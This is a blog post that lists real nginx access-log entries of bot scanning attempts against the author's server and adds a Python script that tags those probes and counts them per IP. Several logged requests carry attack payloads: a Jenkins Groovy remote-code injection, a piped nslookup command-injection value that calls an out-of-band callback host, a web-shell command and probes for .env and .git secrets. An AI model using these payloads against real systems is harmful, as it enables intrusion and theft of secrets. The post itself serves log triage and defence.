Thursday, February 1, 2024

Requests You Can Get

Running my blog on a proper cloud compute instance with nginx gives you a lot more insight into your website traffic. Here is a selection of the weird requests I've received over and over. I assume many of these are bots trying to hack me.

I ssh into my instance and run

cat /var/log/nginx/access.log

which prints one line per request in nginx's default combined log format: client IP, timestamp, request line, status code, bytes sent, referer and user agent.

45.118.146.123 - - [31/Jan/2024:21:10:05 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 134 "http://170.64.194.63:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.71.204.176 - - [31/Jan/2024:20:57:05 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
78.153.140.175 - - [31/Jan/2024:20:46:17 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [31/Jan/2024:20:46:20 +0000] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03\xB4\xB3c\xCD\xDE.PBa\xA4\xC5bz7!\x975)\xAB\xE0\x15\x90\x10J\xB24V\x899q\x07\xE7 0\x92\xD2@W-79\x00\x06uA)k\xA7\xA1\xB3\x12jz\x88\x00\x8D\xC8\x17^\xC0e`-*\x9E\x00b\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\xA3\x00\x9F\x00\xA2\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0$\xC0(\xC0" 400 166 "-" "-"
167.71.204.176 - - [31/Jan/2024:20:33:22 +0000] "POST /integration/saveGangster.action HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
167.71.204.176 - - [31/Jan/2024:20:01:19 +0000] "GET /webadmin/script?command=|%20nslookup%20cmt7k4eft607jm8s2jog3p5dyae4cqszu.oast.pro HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
193.46.255.120 - - [31/Jan/2024:13:54:22 +0000] "GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
167.71.204.176 - - [31/Jan/2024:13:21:44 +0000] "GET /seeyon/test123456.jsp?pwd=asasd3344&2bioD1RjT6Mp6jPRn9dMjk94geq=ipconfig HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
162.158.94.158 - - [31/Jan/2024:06:20:57 +0000] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
172.71.81.145 - - [31/Jan/2024:04:11:40 +0000] "GET /.git/config HTTP/1.1" 404 9 "-" "Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5"
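Lines like these are easier to triage with a small script than by eye. The following Python is an added example and not part of the original post: it parses nginx's combined log format, tags the probe types visible above (the .env and .git/config requests, the Jenkins checkScriptCompile path, the boaform router login, the oast.pro out-of-band DNS callback, and a TLS ClientHello sent to the plaintext port, which nginx logs as the literal text \x16\x03... and answers with a 400), and counts tagged hits per client IP. The log lines it runs on are constructed with documentation-reserved addresses and modelled on the real ones above; the tag names and the repeat-offender threshold are my own choices.

```python
import re
from collections import Counter

# nginx "combined" log format:
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent
# "$http_referer" "$http_user_agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Probe signatures taken from the log above. The tag names are my own labels (assumption).
SIGNATURES = [
    ("dotenv-probe", re.compile(r"/\.env\b")),             # looking for a stray .env with secrets
    ("git-probe", re.compile(r"/\.git/")),                 # looking for an exposed repository
    ("jenkins-probe", re.compile(r"checkScriptCompile")),  # Jenkins script-compile endpoint
    ("router-admin-probe", re.compile(r"/boaform/")),      # consumer router admin login
    ("oob-callback", re.compile(r"\.oast\.[a-z]+\b")),     # out-of-band callback hostname
]

# nginx escapes non-printable request bytes as \xNN, so a TLS ClientHello
# (record type 0x16, version 0x03) sent to the plaintext port is logged as this literal text.
TLS_PREFIX = r"\x16\x03"


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(request):
    """Return the list of probe tags that match a single $request string."""
    tags = []
    if request.startswith(TLS_PREFIX):
        tags.append("tls-on-plaintext-port")
    for name, pattern in SIGNATURES:
        if pattern.search(request):
            tags.append(name)
    return tags


def scan(lines, threshold=2):
    """Tag every suspicious request and count tagged hits per client IP.

    Returns (findings, hits, noisy): findings is a list of
    (ip, status, tags, request) tuples, hits is a Counter of tagged
    requests per IP, and noisy is the set of IPs at or above threshold.
    """
    findings, hits = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["request"])
        if tags:
            hits[rec["ip"]] += 1
            findings.append((rec["ip"], rec["status"], tags, rec["request"]))
    noisy = {ip for ip, n in hits.items() if n >= threshold}
    return findings, hits, noisy


# Constructed sample lines (documentation-reserved IPs), modelled on the real ones above.
SAMPLE_LOG = r'''
203.0.113.10 - - [31/Jan/2024:20:46:17 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.10 - - [31/Jan/2024:20:46:20 +0000] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03\xB4" 400 166 "-" "-"
198.51.100.7 - - [31/Jan/2024:20:57:05 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=import%20Payload; HTTP/1.1" 404 9 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Jan/2024:20:01:19 +0000] "GET /webadmin/script?command=|%20nslookup%20abc123.oast.pro HTTP/1.1" 404 9 "-" "Mozilla/5.0"
192.0.2.44 - - [31/Jan/2024:21:10:05 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 404 134 "http://192.0.2.1:80/admin/login.asp" "Mozilla/5.0"
192.0.2.44 - - [31/Jan/2024:04:11:40 +0000] "GET /.git/config HTTP/1.1" 404 9 "-" "Mozilla/4.0"
192.0.2.99 - - [31/Jan/2024:12:00:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''.strip().splitlines()


if __name__ == "__main__":
    findings, hits, noisy = scan(SAMPLE_LOG)
    for ip, status, tags, request in findings:
        print(f"{ip:<14} {status} {','.join(tags):<24} {request[:60]}")
    print("repeat offenders:", sorted(noisy))
```

Every real line above is a 404, which means the scanner found nothing to hit; the status column is kept in the findings precisely so that a 200 against one of these paths stands out when you run this over a larger log. The per-IP counts give you a list of repeat offenders to feed into a firewall deny rule.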

It's pretty sad that the internet is just a cesspool of bots and bad actors trying to do bad things.